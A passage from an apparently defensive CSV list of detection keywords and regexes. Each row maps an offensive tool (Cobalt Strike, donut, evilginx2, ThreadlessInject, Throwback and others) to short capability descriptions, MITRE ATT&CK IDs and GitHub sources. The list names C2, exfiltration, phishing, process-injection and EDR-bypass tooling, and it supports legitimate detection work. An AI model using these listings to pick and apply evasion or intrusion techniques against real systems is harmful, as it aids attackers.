The tool compresses your binary (EXE/DLL) into 7z/zip file format then XOR encrypts the archive and then hides it inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*TheD1rkMtr/AMSI_patch*",".{0,1000}TheD1rkMtr\/AMSI_patch.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*TheD1rkMtr/D1rkInject*",".{0,1000}TheD1rkMtr\/D1rkInject.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it then reverts memory protections and the original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*TheD1rkMtr/DocPlz*",".{0,1000}TheD1rkMtr\/DocPlz.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*TheD1rkMtr/GithubC2*",".{0,1000}TheD1rkMtr\/GithubC2.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*TheD1rkMtr/HeapCrypt*",".{0,1000}TheD1rkMtr\/HeapCrypt.{0,1000}","offensive_tool_keyword","HeapCrypt","Encrypting the Heap while sleeping by hooking and modifying Sleep with our own 
sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*TheD1rkMtr/NTDLLReflection*",".{0,1000}TheD1rkMtr\/NTDLLReflection.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*TheD1rkMtr/Pspersist*",".{0,1000}TheD1rkMtr\/Pspersist.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever a powershell process is created the implant will be executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*TheD1rkMtr/Shellcode-Hide*",".{0,1000}TheD1rkMtr\/Shellcode\-Hide.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*TheD1rkMtr/StackCrypt*",".{0,1000}TheD1rkMtr\/StackCrypt.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then go to sleep then decrypt the stacks and resume 
threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","153","25","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" "*TheD1rkMtr/UnhookingPatch*",".{0,1000}TheD1rkMtr\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*TheGejr/SpringShell*",".{0,1000}TheGejr\/SpringShell.{0,1000}","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","2","127","85","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z" "*theHarvester*",".{0,1000}theHarvester.{0,1000}","offensive_tool_keyword","theHarvester","E-mails. 
subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","10357","1908","2024-04-30T21:39:29Z","2011-01-01T20:40:15Z" "*theHarvester.py -d *",".{0,1000}theHarvester\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*thelinuxchoice/tweetshell*",".{0,1000}thelinuxchoice\/tweetshell.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*ThemeBleed.exe *",".{0,1000}ThemeBleed\.exe\s\s.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*ThePorgs/Exegol-images*",".{0,1000}ThePorgs\/Exegol\-images.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*therealwover@protonmail.com*",".{0,1000}therealwover\@protonmail\.com.{0,1000}","offensive_tool_keyword","donut","Donut is 
a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*The-Viper-One/PME-Scripts*",".{0,1000}The\-Viper\-One\/PME\-Scripts.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*The-Viper-One/PsMapExec*",".{0,1000}The\-Viper\-One\/PsMapExec.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*thewover/donut*",".{0,1000}thewover\/donut.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*thiagopeixoto/winsos-poc*",".{0,1000}thiagopeixoto\/winsos\-poc.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*thief.py -*",".{0,1000}thief\.py\s\-.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*third_party/SharpGen*",".{0,1000}third_party\/SharpGen.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*third-party*winvnc*.dll*",".{0,1000}third\-party.{0,1000}winvnc.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*This is the modified maintained version of Evilginx2. 
No one will be held responsible for your activities*",".{0,1000}This\sis\sthe\smodified\smaintained\sversion\sof\sEvilginx2\.\sNo\sone\swill\sbe\sheld\sresponsible\sfor\syour\sactivities.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","N/A","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*This option will cause DDSpoof to create DNS records on the server*",".{0,1000}This\soption\swill\scause\sDDSpoof\sto\screate\sDNS\srecords\son\sthe\sserver.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*this.is.not.a.phishing.site.evilsite.com*",".{0,1000}this\.is\.not\.a\.phishing\.site\.evilsite\.com.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*thisisateststringdontcatchme*",".{0,1000}thisisateststringdontcatchme.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ThisIsNotRat-main*",".{0,1000}ThisIsNotRat\-main.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computer from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*thoth.py -*",".{0,1000}thoth\.py\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*thoth-master.zip*",".{0,1000}thoth\-master\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*Thread_Hiijack_Inject_Load.*",".{0,1000}Thread_Hiijack_Inject_Load\..{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*thread-injector.exe *",".{0,1000}thread\-injector\.exe\s.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*Threadless injection failed*",".{0,1000}Threadless\sinjection\sfailed.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*ThreadlessInject* -p * -d *",".{0,1000}ThreadlessInject.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*ThreadlessInject.exe*",".{0,1000}ThreadlessInject\.exe.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*ThreadlessInject-master*",".{0,1000}ThreadlessInject\-master.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*ThreadPoolInjection.lastbuildstate*",".{0,1000}ThreadPoolInjection\.lastbuildstate.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*Thread-Pool-Injection-PoC-main*",".{0,1000}Thread\-Pool\-Injection\-PoC\-main.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*threads all alertable*",".{0,1000}threads\sall\salertable.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ThreadStackSpoofer*",".{0,1000}ThreadStackSpoofer.{0,1000}","offensive_tool_keyword","C2 related 
tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ThreatCheck.csproj*",".{0,1000}ThreatCheck\.csproj.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion 
Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*ThreatCheck.exe*",".{0,1000}ThreatCheck\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*ThreatCheck-master*",".{0,1000}ThreatCheck\-master.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*threatexpress*",".{0,1000}threatexpress.{0,1000}","offensive_tool_keyword","Github Username","github repo hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/threatexpress","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*threatexpress*malleable*",".{0,1000}threatexpress.{0,1000}malleable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "*threatexpress/cs2modrewrite*",".{0,1000}threatexpress\/cs2modrewrite.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" 
"*Throwback\Base64_RC4.h*",".{0,1000}Throwback\\Base64_RC4\.h.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*throwback_x64.exe*",".{0,1000}throwback_x64\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*throwback_x86.exe*",".{0,1000}throwback_x86\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*throwBackDev.exe*",".{0,1000}throwBackDev\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThrowbackDLL.cpp*",".{0,1000}ThrowbackDLL\.cpp.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*ThrowbackDLL.exe*",".{0,1000}ThrowbackDLL\.exe.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - 
